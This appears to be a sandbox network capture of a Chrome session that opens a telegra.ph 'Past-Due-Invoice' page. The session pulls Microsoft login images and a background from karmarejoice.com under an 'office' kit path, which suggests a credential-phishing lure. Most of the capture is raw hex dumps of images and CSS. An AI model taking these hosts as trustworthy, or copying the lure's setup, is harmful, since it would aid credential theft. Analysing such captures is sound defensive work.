                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC964INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                                                                                                                            Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC979INData Raw: 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: ( @


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            31192.168.2.64991013.107.219.60443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC981OUTGET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC981INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800
                                                                                                                                                                                                                            Content-Length: 17174
                                                                                                                                                                                                                            Content-Type: image/x-icon
                                                                                                                                                                                                                            Content-MD5: EuPayFgGHQiAI7K9SOL6lg==
                                                                                                                                                                                                                            Last-Modified: Fri, 02 Nov 2018 20:25:25 GMT
                                                                                                                                                                                                                            ETag: 0x8D6410152A9D7E1
                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            x-ms-request-id: 6197f52b-301e-005c-0df5-65a059000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Azure-Ref-OriginShield: 0o/J8YgAAAADCMMUTo3WjS7/8ryHrBx8IQU1TMDRFREdFMTkyMQAzOWExMmY3ZS04OTlmLTQ2Y2YtYTZkMC0yNGJiYmEyN2Q5NTY=
                                                                                                                                                                                                                            X-Azure-Ref: 0oad+YgAAAAAOE2qQfve9RKUTnHdAOoPFRlJBMjMxMDUwNDE3MDIxADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:57 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC982INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                                                                                                                            Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC997INData Raw: 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: ( @


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            32192.168.2.64991113.107.219.60443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC981OUTGET /ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC999INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800
                                                                                                                                                                                                                            Content-Length: 276
                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                            Content-MD5: TjUQkZ0p0Y7rbj6LJofS9Q==
                                                                                                                                                                                                                            Last-Modified: Fri, 02 Nov 2018 20:25:09 GMT
                                                                                                                                                                                                                            ETag: 0x8D64101494758DF
                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            x-ms-request-id: 91d75960-a01e-0035-2365-659168000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            X-Azure-Ref-OriginShield: 0uPZ8YgAAAADRllNsVPngSLm6Fx3AJ8dqQU1TMDRFREdFMTgyMgAzOWExMmY3ZS04OTlmLTQ2Y2YtYTZkMC0yNGJiYmEyN2Q5NTY=
                                                                                                                                                                                                                            X-Azure-Ref: 0oad+YgAAAAD01jIUDNphRblesRxq6wwoRlJBMjMxMDUwNDE5MDUxADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:57 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC1000INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                                                                                                                                                                            Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            33192.168.2.649912192.229.221.185443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC1000OUTGET /16.000.28543.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
                                                                                                                                                                                                                            Host: logincdn.msauth.net
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC1000INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Age: 30203662
                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                            Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:57 GMT
                                                                                                                                                                                                                            Etag: 0x8D7D6AF114B65DE
                                                                                                                                                                                                                            Last-Modified: Thu, 02 Apr 2020 02:39:29 GMT
                                                                                                                                                                                                                            Server: ECAcc (frc/8F6B)
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-request-id: 8b3f02e4-001e-004e-5546-54e3c9000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            Content-Length: 3651
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2022-05-13 18:46:57 UTC1001INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                                                                                                                                                                                                            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            34192.168.2.649914103.53.43.226443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1005OUTGET /lopi/office-RD117/images/bg.jpg HTTP/1.1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
                                                                                                                                                                                                                            Host: karmarejoice.com
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1005INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:58 GMT
                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                            Last-Modified: Mon, 31 Aug 2020 21:49:20 GMT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 42147
                                                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1005INData Raw: ff d8 ff e1 05 93 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 94 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 38 3a 33 31 20 32 31 3a 34 39 3a 31 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 05 56 a0 03 00 04 00 00 00 01 00 00 03 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                                                            Data Ascii: ExifMM*bj(1"r2i''Adobe Photoshop CC 2015 (Windows)2020:08:31 21:49:19V"
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1013INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1021INData Raw: 00 00 84 d4 b0 6a 52 2c 92 11 92 19 85 46 09 04 0c 11 d4 86 01 b0 06 40 00 00 00 00 00 00 00 00 01 58 d1 2c 9b 4b 83 34 85 00 30 6a 6c 0d 4d 49 40 00 1a 98 85 99 58 c1 b8 8c d6 c6 86 c6 4c 80 00 00 02 b9 92 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 13 52 c1 54 f9 88 ca bf 24 db 2f 4f 2f 2d 67 b3 73 99 5d dc 5e 65 ce b9 b3 eb 31 ae 2d e6 c5 ba 84 d0 f6 c7 a4 00 00 00 00 00 00 00 00 00 11 f3 9c eb cb 72 63 a5 9b 04 bd 4b 9e 94 bc 03 a7 5d 2a e5 44 95 d3 d3 cb e5 62 a7 ca a1 64 ec 59 c8 cd dc bf a5 59 2b 5b 88 87 32 c6 ef 4f 32 8d b4 ae a4 b3 b0 73 12 48 ae 4d 97 77 4f 5e 64 00 00 00 ae 64 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 d4 b0 68 72 8a 39 b4 f7 2d e7 26 ab d4 c5
                                                                                                                                                                                                                            Data Ascii: jR,F@X,K40jlMI@XLpRT$/O/-gs]^e1-rcK]*DbdYY+[2O2sHMwO^ddhr9-&
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1028INData Raw: b7 b6 c8 dd 46 44 99 58 63 73 b3 96 ed 51 64 e2 99 ae cb c2 c3 f9 9b 72 a3 bd 8a 46 bb 25 13 0f e6 6d d3 32 d0 15 05 c0 9b e7 12 02 5c d8 85 34 82 d2 0b 48 2d 20 b4 82 d2 0b 48 2d 20 b4 82 d2 0b 48 2d 20 b4 82 d2 0b 48 2d 20 b4 82 7b 3a 14 64 90 ae 3b 2d fb 3d 13 37 6c 1c 32 0c 73 ed ef 30 37 93 4f 05 8d fd ab 69 91 71 73 32 21 d6 2d b9 d0 bf b5 be 33 cb 67 7a f1 65 6f 7d 1b 26 b6 ba 73 f6 97 6a c6 2b c0 ae ed ee 1a 1b 6d 72 e4 cb 5b ee ac 3b 5f 1c 3f 37 3c dd f0 12 00 7d fc 4d 7b 2e 22 70 d5 8d 6a c6 8d d4 0d 46 e6 3a 36 f2 17 1d 68 d0 7b 5d f0 c8 39 46 39 2b 8e cb 7e cf 44 cd db 07 07 74 d1 d2 59 85 2c 96 44 c6 eb 12 5f b2 09 b7 16 ac 4f 92 c8 87 5c 59 35 c2 4b 60 c6 5c 59 bc bd d6 00 4b 91 b3 b7 50 de d9 dc a6 ec 01 7c b6 2c 4d c9 5b 34 c7 79 1d 37 96
                                                                                                                                                                                                                            Data Ascii: FDXcsQdrF%m2\4H- H- H- H- {:d;-=7l2s07Oiqs2!-3gzeo}&sj+mr[;_?7<}M{."pjF:6h{]9F9+~DtY,D_O\Y5K`\YKP|,M[4y7
                                                                                                                                                                                                                            2022-05-13 18:46:58 UTC1036INData Raw: e0 0e d5 e8 b7 25 e5 00 51 36 9f d7 06 f4 36 0f 72 8e c2 8e e4 6c b8 38 38 23 7f 57 a3 d3 24 97 2f 68 5f f4 fd 3f b4 2f fa 7e 9f da 17 fd 3f 4f ed b5 7f 07 4f ed b5 7f d3 f4 fe db 57 f0 74 fe db 56 3f e3 f4 fe d0 bf e9 fa 74 0b fe 9f a6 df f9 6d 42 fe 97 46 cb 48 3a 2d 1a 10 b6 d8 00 7b 5c a8 fe 88 f7 28 6f 5b 1b 83 fb 94 5b 51 5d ea 33 58 8c 77 85 19 95 19 95 19 95 1c 7e 0a 38 fc 14 66 54 66 54 66 54 66 56 03 8a c4 71 50 3b 6e 50 3b 6e 51 c5 47 1f 82 8e 3f 05 03 3f 82 81 db 72 8e 3f 05 1c 7e 0b d2 29 f2 50 3b 6e 51 c7 e0 a3 8f c1 40 cf e0 a0 67 f0 5e 91 db 72 f4 8a 7c 97 a4 53 e4 bd 22 9f 25 e9 14 f9 2f 48 a7 c9 7a 45 3e 4b d2 29 f2 5e 91 4f 92 f4 8a 7c 97 a4 53 e4 bd 22 9f 25 e9 14 f9 2f 48 a7 c9 7a 45 3e 4b d2 29 f2 5e 91 4f 92 f4 8a 7c 97 a4 53 e4 bd
                                                                                                                                                                                                                            Data Ascii: %Q66rl88#W$/h_?/~?OOWtV?tmBFH:-{\(o[[Q]3Xw~8fTfTfTfVqP;nP;nQG??r?~)P;nQ@g^r|S"%/HzE>K)^O|S"%/HzE>K)^O|S
                                                                                                                                                                                                                            2022-05-13 18:46:59 UTC1044INData Raw: 58 47 7f 87 b2 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0a 45 42 91 50 a4 54 29 15 0b 02 e8 6f e0 86 c1 ee 57 6d 61 1d fe 0a 59 4e 4a 72 53 92 9c 94 e4 a7 25 39 29 c9 4e 4a 72 53 92 9c 94 e4 a7 25 39 29 c9 4e 4a 72
                                                                                                                                                                                                                            Data Ascii: XGEBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)EBPT)oWmaYNJrS%9)NJrS%9)NJr


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            4192.168.2.649854149.154.164.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC11OUTGET /css/quill.core.min.css HTTP/1.1
                                                                                                                                                                                                                            Host: telegra.ph
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                            Referer: https://telegra.ph/Past-Due-Invoice-05-13
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC13INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:44 GMT
                                                                                                                                                                                                                            Content-Type: text/css
                                                                                                                                                                                                                            Content-Length: 7190
                                                                                                                                                                                                                            Last-Modified: Mon, 14 Nov 2016 18:41:34 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            ETag: "582a055e-1c16"
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC14INData Raw: 2f 2a 21 0a 20 2a 20 51 75 69 6c 6c 20 45 64 69 74 6f 72 20 76 31 2e 30 2e 30 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 71 75 69 6c 6c 6a 73 2e 63 6f 6d 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 2c 20 4a 61 73 6f 6e 20 43 68 65 6e 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 2c 20 73 61 6c 65 73 66 6f 72 63 65 2e 63 6f 6d 0a 20 2a 2f 0a 2e 71 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65
                                                                                                                                                                                                                            Data Ascii: /*! * Quill Editor v1.0.0 * https://quilljs.com/ * Copyright (c) 2014, Jason Chen * Copyright (c) 2013, salesforce.com */.ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:relative


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            5192.168.2.649855149.154.164.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC11OUTGET /css/core.min.css?46 HTTP/1.1
                                                                                                                                                                                                                            Host: telegra.ph
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                            Referer: https://telegra.ph/Past-Due-Invoice-05-13
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC21INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:44 GMT
                                                                                                                                                                                                                            Content-Type: text/css
                                                                                                                                                                                                                            Content-Length: 232947
                                                                                                                                                                                                                            Last-Modified: Tue, 21 Dec 2021 00:38:19 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            ETag: "61c121fb-38df3"
